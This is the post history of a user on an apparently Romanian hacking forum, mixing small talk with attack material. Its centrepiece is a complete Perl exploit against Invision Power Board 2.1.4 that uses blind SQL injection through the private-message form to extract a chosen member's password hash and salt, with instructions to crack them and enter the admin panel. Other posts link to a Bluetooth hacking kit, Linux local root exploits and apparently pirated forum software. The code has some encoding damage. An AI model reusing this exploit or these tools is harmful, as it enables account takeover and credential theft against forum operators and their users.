Ecstasy
-
Posts
24 -
Joined
-
Last visited
Never
Posts posted by Ecstasy
-
-
Hey, If anyone is interested in football, who do you think is going to win the world cup ?
I think Brasil has a good chance, but personally I would like England to win. So let me know what you guys think
-
Ahh, ok then thanks for letting me know guys
-
#!/usr/bin/perl
#############################################################################
## IPB <=2.1.4 exploit (possibly 2.1.5 too)                 ÂÂÂÂ
## Brought to you by SHAK AND TEMUJIN.                ÂÂÂÂ
## Originally by the Ykstortion security team.      ÂÂÂÂ
##                       ÂÂÂÂ
## The exploit will retrieve the MD5 pass hash along with the case
## sensitive salt
##
## The bug is in the pm system so you must have a registered user.     ÂÂÂÂ
## The exploit will extract a password hash from the forum's data base of  ÂÂÂÂ
## the target user.                             ÂÂÂÂ
## You need to know the target user's member ID but it's not difficult to  ÂÂÂÂ
## find out, just look under their avatar next to one of their posts.    ÂÂÂÂ
## After you run the exploit, crack the hash with the salt               ÂÂÂÂ
## and log into the ACP
##
## Usage:                                  ÂÂÂÂ
##  $ ./ipb                                ÂÂÂÂ
##  IPB Forum URL ? forums.example.com/forums               ÂÂÂÂ
##  Your username ? krypt_sk1dd13                     ÂÂÂÂ
##  Your pass ? if_your_on_nix_this_gets_hidden              ÂÂÂÂ
##  Target userid ? 3637                          ÂÂÂÂ
##                                     ÂÂÂÂ
##  Attempting to extract password hash from database...         ÂÂÂÂ
##  537ab2d5b37ac3a3632f5d06e8e04368
##  Attempting to extract password salt from database...
##  _jnDE
##  Hit enter to quit.                           ÂÂÂÂ
##                                     ÂÂÂÂ
## Requirements:                              ÂÂÂÂ
##  o Perl 5                               ÂÂÂÂ
##  o LWP 5.64 or later                          ÂÂÂÂ
##  o Internet access                           ÂÂÂÂ
##  o A forum                       ÂÂÂÂ
##  o A user on said forum                         ÂÂÂÂ
##  o 32+ PMs left till your inbox is full, if not you can still delete  ÂÂÂÂ
##   PMs from your inbox as the successful ones come through       ÂÂÂÂ
##                                     ÂÂÂÂ
## Credit to: Nuticulus for finding the SQL injection            ÂÂÂÂ
##                                                            ÂÂÂÂ
###########################################################################
ÂÂÂÂ
use HTTP::Cookies;
use LWP 5.64;
use HTTP::Request;
ÂÂÂÂ
# variables
my $login_page = '?act=Login&CODE=01';
my $pm_page = '?act=Msg&CODE=04';
my $pose_pm_page = '?';
my $tries = 5;
my $sql = '';
my $hash = '';
my $need_null = 0;
my $i;
my $j;
ÂÂÂÂ
my @charset = ('0'..'9','a'..'f');
ÂÂÂÂ
my %form = (act    => 'Msg',
 CODE    => '04',
 MODE    => '01',
 OID    => '',
 removeattachid  => '',
 msg_title  => 'asdf',
 bbmode    => 'normal',
 ffont    => 0,
 fsize    => 0,
 fcolor    => 0,
 LIST    => ' LIST ',
 helpbox    => 'Insert Monotype Text (alt + p)',
 tagcount  => 0,
 Post    => 'jkl');
 ÂÂÂÂ
ÂÂÂÂ
# objects
my $ua = LWP::UserAgent->new;
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;
ÂÂÂÂ
# init the cookie jar
$ua->cookie_jar ($cj);
ÂÂÂÂ
# allow redirects on post requests
push @{ $ua->requests_redirectable }, "POST";
ÂÂÂÂ
# get user input
print 'IPB Forum URL ? ';
chomp (my $base_url = <STDIN>);
print 'Your username ? ';
chomp (my $user = <STDIN>);
$form{entered_name} = $user;
print 'Your pass ? ';
#system 'stty -echo';    # to turn off echoing
chomp (my $pass = <STDIN>);
#system 'stty echo';    # to turn it back on
print "n";
print 'Target userid ? ';  # it'll say next to one of their posts
chomp (my $tid = <STDIN>);
ÂÂÂÂ
# parse the given base url
if ($base_url !~ m#^[url]http://#[/url]) { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index.php$#) { $base_url .= '/' }
ÂÂÂÂ
do {
 $resp = $ua->post ($base_url . $login_page,
   [ UserName => $user,
    PassWord => $pass,
    CookieDate => 1,
   ]);
} while ($tries-- && !$resp->is_success());
ÂÂÂÂ
# reset tries
$tries = 5;
ÂÂÂÂ
# did we get 200 (OK) ?
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" }
ÂÂÂÂ
# was the pass right ?
if ($resp->content =~ /sorry, the password was wrong/i) {
 die "Error: password incorrect.n";
}
ÂÂÂÂ
# get ourselves a post_key (and an auth_key too with newer versions)
do {
 $resp = $ua->get ($base_url . $pm_page);
} while ($tries-- && !$resp->is_success());
ÂÂÂÂ
# reset tries
$tries = 5;
ÂÂÂÂ
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "n" }
if ($resp->content =~ m#<inputs+?type=["']?hidden["']?s+?name=["']?post_key["']?s+?value=["']?([0-9a-f]{32})["']?s+?/>#)
{
 $form{post_key} = $1;
} else {
 die "Error: couldn't get a post key.n";
}
if ($resp->content =~ m#<inputs+?type=["']?hidden["']?s+?name=["']?auth_key["']?s+?value=["']?([0-9a-f]{32})["']?s+/>#)
{
 $form{auth_key} = $1;
}
ÂÂÂÂ
# turn off buffering so chars in the hash show up straight away
$| = 1;
ÂÂÂÂ
print "nAttempting to extract password hash from database...n ";
ÂÂÂÂ
OFFSET:
for ($i = 0; $i < 32; ++$i) {
 CHAR:
 for ($j = 0; $j < scalar(@charset); ++$j) {
   # reset tries
   $tries = 5;
   print "x08", $charset[$j];
   # build sql injection
   $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('
     . (join (',', map {ord} split ('', $user))) . ') FROM '
     . 'ibf_members_converge WHERE converge_id = ' . $tid . ' AND MID('
     . 'converge_pass_hash, ' . ($i + 1) . ', 1) = CHAR('
     . ord ($charset[$j]) . ')';
   $form{from_contact} = $sql;
   $resp = $ua->post ($base_url . $post_pm_page, %form,
    referer => $base_url . $pm_page);
   if (!$resp->is_success()) {
    die "nError: " . $resp->status_line
     . "n" if (!$tries);
    --$tries;
    redo;
   }
   if ($resp->content =~ /sql error/i) {
    if ($need_null) {
      die "Error: SQL error.n";
    } else {
      $need_null = 1;
      redo OFFSET;
    }
   } elsif ($resp->content !~ /there is no such member/i) {
    # we have a winner !
    print ' ';
    next OFFSET;
   }
 }
 # uh oh, something went wrong
 print "nError: couldn't get a char for offset $in";
}
ÂÂÂÂ
@charset = ();
for($j = 33; $j <= 126; $j++)
{
push(@charset, chr($j));
}
ÂÂÂÂ
print "nAttempting to extract password salt from database...n ";
ÂÂÂÂ
OFFSET:
for ($i = 0; $i < 5; ++$i) {
 CHAR:
 for ($j = 0; $j < scalar(@charset); ++$j) {
   # reset tries
   $tries = 5;
   print "x08", $charset[$j];
   # build sql injection
   $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('
     . (join (',', map {ord} split ('', $user))) . ') FROM '
     . 'ibf_members_converge WHERE converge_id = ' . $tid . ' AND MID('
     . 'converge_pass_salt, ' . ($i + 1) . ', 1) = BINARY CHAR('
     . ord ($charset[$j]) . ')';
   $form{from_contact} = $sql;
   $resp = $ua->post ($base_url . $post_pm_page, %form,
    referer => $base_url . $pm_page);
   if (!$resp->is_success()) {
    die "nError: " . $resp->status_line
     . "n" if (!$tries);
    --$tries;
    redo;
   }
   if ($resp->content =~ /sql error/i) {
    if ($need_null) {
      die "Error: SQL error.n";
    } else {
      $need_null = 1;
      redo OFFSET;
    }
   } elsif ($resp->content !~ /there is no such member/i) {
    # we have a winner !
    print ' ';
    next OFFSET;
   }
 }
 # uh oh, something went wrong
 die "nError: couldn't get a char for offset $in";
}
ÂÂÂÂ
print "x08 x08nHit enter to quit.n";
<STDIN>; -
Thanks! :@
-
Any one know why h4cky0u.org is offline ?
-
BlueTooth Hacking Kit.
http://d.turboupload.com/d/722626/Bluetooth-Hacking-Kit.zip.html
-
By sys7em.
http://rapidshare.de/files/18195248/Root_on_Linux.rar.html
-
Linux local root
http://www.sh3ll.persiangig.com/Film/Linux%20Local%20Root.rar
-
vBulletin 3.5.x
http://d.turboupload.com/d/736458/Vbulletin_3.5.x._By_Cro-Warez.rar.html
-
Thanks
-
Lmao, thanks a lot mate
-
Hi, I'm wondering is there a way I can make the board use english ? because I cannot speak romanian :@Cheers
Knoppix Install - How to install knoppix linux to your hard
in Cosul de gunoi
Posted
Hmm, thruthewire.net has pinched all of IronGeek's video's lol...